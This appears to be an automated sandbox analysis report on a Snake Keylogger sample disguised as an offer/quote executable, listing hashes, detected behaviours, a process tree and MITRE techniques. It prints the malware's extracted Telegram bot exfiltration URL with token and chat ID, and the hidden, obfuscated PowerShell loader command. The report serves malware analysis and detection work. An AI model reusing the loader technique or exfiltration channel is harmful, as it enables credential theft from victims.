Analysis
-
max time kernel
143s -
max time network
141s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
06-11-2024 14:29
Static task
static1
Behavioral task
behavioral1
Sample
Offer-7839373637-8839373-Quote8992832.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Offer-7839373637-8839373-Quote8992832.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Saganashes.ps1
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Saganashes.ps1
Resource
win10v2004-20241007-en
General
-
Target
Offer-7839373637-8839373-Quote8992832.exe
-
Size
767KB
-
MD5
21a5378b2c78f66fff23ec764cba65f2
-
SHA1
94e2921a8a2e47611c936235b5ba03feecf00fff
-
SHA256
b23119bb95d44f50e52555f51c9931389d3d559b9f74e34041e9fa6bc2b7f481
-
SHA512
885aaec0dea4fbf8d46da71bb34f776a8f212e99bf7da7082ef312a1936d46d5b59327c5650a50582df474cae7174dfafe3fa606876d218501f02cd3a25e05d0
-
SSDEEP
12288:bMwhYlU9blucsKZ1XjfCTD/qp0xmk9qPARcQFY9fcNLqH66cOsFoTvGU5ZqLm:bMwhY+9blYKPGZx0PARxFWfcFqal/F4X
Malware Config
Extracted
snakekeylogger
https://api.telegram.org/bot7602241848:AAGOG1RAiVBKad-IMDgRf04J_SQO8x6g-hI/sendMessage?chat_id=5302361040
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 2 IoCs
resource yara_rule behavioral2/memory/3508-231-0x0000000000A10000-0x0000000000A36000-memory.dmp family_snakekeylogger behavioral2/memory/3508-230-0x0000000000A10000-0x0000000001C64000-memory.dmp family_snakekeylogger -
Snakekeylogger family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2668 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 4 IoCs
flow pid Process 18 3508 msiexec.exe 21 3508 msiexec.exe 25 3508 msiexec.exe 40 3508 msiexec.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 20 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 3508 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2668 powershell.exe 3508 msiexec.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Common Files\genfortolkende.ini Offer-7839373637-8839373-Quote8992832.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\resources\0409\Kdebrker\Sttteforeningen.man Offer-7839373637-8839373-Quote8992832.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Offer-7839373637-8839373-Quote8992832.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 2668 powershell.exe 2668 powershell.exe 2668 powershell.exe 2668 powershell.exe 2668 powershell.exe 2668 powershell.exe 2668 powershell.exe 2668 powershell.exe 2668 powershell.exe 3508 msiexec.exe 3508 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2668 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 2668 powershell.exe Token: SeIncreaseQuotaPrivilege 2668 powershell.exe Token: SeSecurityPrivilege 2668 powershell.exe Token: SeTakeOwnershipPrivilege 2668 powershell.exe Token: SeLoadDriverPrivilege 2668 powershell.exe Token: SeSystemProfilePrivilege 2668 powershell.exe Token: SeSystemtimePrivilege 2668 powershell.exe Token: SeProfSingleProcessPrivilege 2668 powershell.exe Token: SeIncBasePriorityPrivilege 2668 powershell.exe Token: SeCreatePagefilePrivilege 2668 powershell.exe Token: SeBackupPrivilege 2668 powershell.exe Token: SeRestorePrivilege 2668 powershell.exe Token: SeShutdownPrivilege 2668 powershell.exe Token: SeDebugPrivilege 2668 powershell.exe Token: SeSystemEnvironmentPrivilege 2668 powershell.exe Token: SeRemoteShutdownPrivilege 2668 powershell.exe Token: SeUndockPrivilege 2668 powershell.exe Token: SeManageVolumePrivilege 2668 powershell.exe Token: 33 2668 powershell.exe Token: 34 2668 powershell.exe Token: 35 2668 powershell.exe Token: 36 2668 powershell.exe Token: SeDebugPrivilege 3508 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 4080 wrote to memory of 2668 4080 Offer-7839373637-8839373-Quote8992832.exe 84 PID 4080 wrote to memory of 2668 4080 Offer-7839373637-8839373-Quote8992832.exe 84 PID 4080 wrote to memory of 2668 4080 Offer-7839373637-8839373-Quote8992832.exe 84 PID 2668 wrote to memory of 3508 2668 powershell.exe 97 PID 2668 wrote to memory of 3508 2668 powershell.exe 97 PID 2668 wrote to memory of 3508 2668 powershell.exe 97 PID 2668 wrote to memory of 3508 2668 powershell.exe 97 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Offer-7839373637-8839373-Quote8992832.exe"C:\Users\Admin\AppData\Local\Temp\Offer-7839373637-8839373-Quote8992832.exe"1⤵
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4080 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Electricizes=Get-Content -Raw 'C:\Users\Admin\AppData\Local\Temp\haandbog\Saganashes.Com';$Forbudsbestemmelses=$Electricizes.SubString(52619,3);.$Forbudsbestemmelses($Electricizes)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:3508
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
307KB
MD51bed7803db687e44713436a3b1bfa9e7
SHA14b3780aac93d35e522adce172a3d2d84c8d471f4
SHA256ca6d0e27587fce2950cba487f154c9c47e2c668dbeee96328eb439a08febf664
SHA512dece7d3399b5fb0fca591eb8588cb1a3bd340019db3e376cd321bbfe6993c330af7171602758a20b268bb8572688d1270fe8b2f3f09fc22f72715868d237528a
-
Filesize
51KB
MD586971efe48eae4401b734e86152c12aa
SHA193376b7df5fa9f5d363e263dd898b86e42e40ec0
SHA2568e626d6dc0bb24ed272eaec732b70f81e306c38eba28df9e96ce78d61a75e455
SHA512a04489dfa81e2fe20f1a8f07c562ed4a05f85b74d5745d6cb712252a46f997a7de6c9f11c3fa902c7c7b03f6ff8596e89e064c251b6a348dfb0d3b7ff6a02455
-
Filesize
1KB
MD5eb15417d1086d52f880fbba82aad7bb3
SHA189cf69b911f98f6444cb115e41c4ec334cca6492
SHA256e7d37daba3c827b169a8c4825582da95aa4ed863a6b1d4e0536612bec118aea2
SHA51298c2d74c36f04a3524be8ec3d82033310e60610ee56e4456d961b4a549e3101bc6b62df03e9da76464fe6d3b65e2bba7adb62b5c0b9f6c4b8fe333a854ac947f